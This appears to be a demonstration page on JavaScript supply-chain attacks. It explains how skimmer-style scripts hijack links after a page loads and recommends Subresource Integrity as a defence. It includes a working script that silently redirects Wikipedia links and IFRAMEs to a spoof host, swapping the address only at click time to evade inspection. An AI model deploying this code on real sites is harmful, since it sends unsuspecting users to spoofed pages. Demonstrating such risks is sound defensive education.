JavaScript Supply Chain Attack Example - Sneakier URL/IFRAME Re-writing

This page provides a short, simple example of how JavaScript can hijack (re-write) a hardcoded URL or IFRAME target after the page has loaded.

What To Expect

This page presents two links that open in new tabs when clicked. One link is left alone, but the Wikipedia link will be hijacked to a spoof site!


Notes:

Checking It Out - Under the Covers

You can check out the link as follows:


Simple Demonstration of Risk

This is not intended to be a full-function URL hijacker; it shows a few of the methods used by criminal gangs in e-commerce skimmers. Normally a skimmer would not be inline at all: it would be pulled in from a third-party host with a script tag like the one below. We've kept ours as an inline script for clarity and simplicity:

<script src="https://any-third-party-script-site.org/package.js"></script>

Our example is deliberately minimalistic. We wanted an example that was clear, uncluttered, and free of excesses. This is provided on a stand-alone page without styles, branding, or other trappings of a modern web site.
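As an added illustration (this is not the page's own demo script), the following is a minimal hijacker of the kind the page describes. It rewrites URLs on one legitimate host to a spoof host, swaps an anchor's href only at mousedown so that hovering still shows the genuine destination, and rewrites IFRAME sources outright. The target host, the spoof host (a reserved .example name) and the DOM wiring at the bottom are assumptions made for this example; the rewrite logic is kept free of DOM dependencies so it can be exercised outside a browser.

```javascript
// Added example, not the page's own demo script: a minimal URL/IFRAME
// hijacker. TARGET_HOST, SPOOF_HOST and the DOM wiring are assumptions.

const TARGET_HOST = 'en.wikipedia.org';        // assumed legitimate host
const SPOOF_HOST = 'wikipedia-spoof.example';  // assumed attacker host (reserved .example TLD)

// Pure rewrite rule: URLs on the target host are sent to the spoof host,
// keeping path and query so the spoof can mirror the page the user expected.
// Other hosts, relative URLs and malformed URLs are returned unchanged.
function rewriteUrl(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch (err) {
    return url;                      // relative or malformed: leave it alone
  }
  if (parsed.hostname !== TARGET_HOST) {
    return url;
  }
  parsed.protocol = 'https:';
  parsed.hostname = SPOOF_HOST;
  return parsed.toString();
}

// The "sneakier" part: the anchor keeps its genuine href, so hovering shows
// the real destination in the status bar and "view source" looks clean.
// The href is swapped only on a left-button mousedown, a moment before the
// browser follows the link. The closures are returned so the logic can be
// driven without a DOM.
function armAnchor(anchor) {
  const genuine = anchor.href;
  const swap = () => { anchor.href = rewriteUrl(genuine); return anchor.href; };
  const restore = () => { anchor.href = genuine; return anchor.href; };
  if (typeof anchor.addEventListener === 'function') {
    anchor.addEventListener('mousedown', (ev) => { if (ev.button === 0) swap(); });
  }
  return { swap, restore };
}

// An IFRAME has no hover preview to preserve, so its src is simply rewritten.
function hijackFrame(frame) {
  frame.src = rewriteUrl(frame.src);
  return frame.src;
}

// Browser wiring: arm every link and frame once the document exists.
// Skipped when there is no document (e.g. under Node).
if (typeof document !== 'undefined') {
  document.querySelectorAll('a[href]').forEach(armAnchor);
  document.querySelectorAll('iframe[src]').forEach(hijackFrame);
}
```

Dropped into a page as an inline script (or served from a third-party host, as a real skimmer would be), this leaves the HTML and the hover preview untouched; only the navigation that actually happens is redirected.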

In the case of a real skimmer, no amount of inspection of your web host or your source will find the problem: the malicious code lives on the third-party site, and that is where you have to look. Most shopping carts include third-party scripts from dozens of URLs, every one of them a potential risk. Your entire site could be served from read-only optical media with continuous file integrity checking and you would still not detect a change of code on a third-party site. This demonstrates the risk of using third-party scripts you have no control over. The one browser-side control you do have for a script you did not write is Subresource Integrity: an integrity attribute on the script tag pins the file to a hash, so a silently modified package.js fails to load rather than running, at the cost of breaking whenever the vendor legitimately changes the file.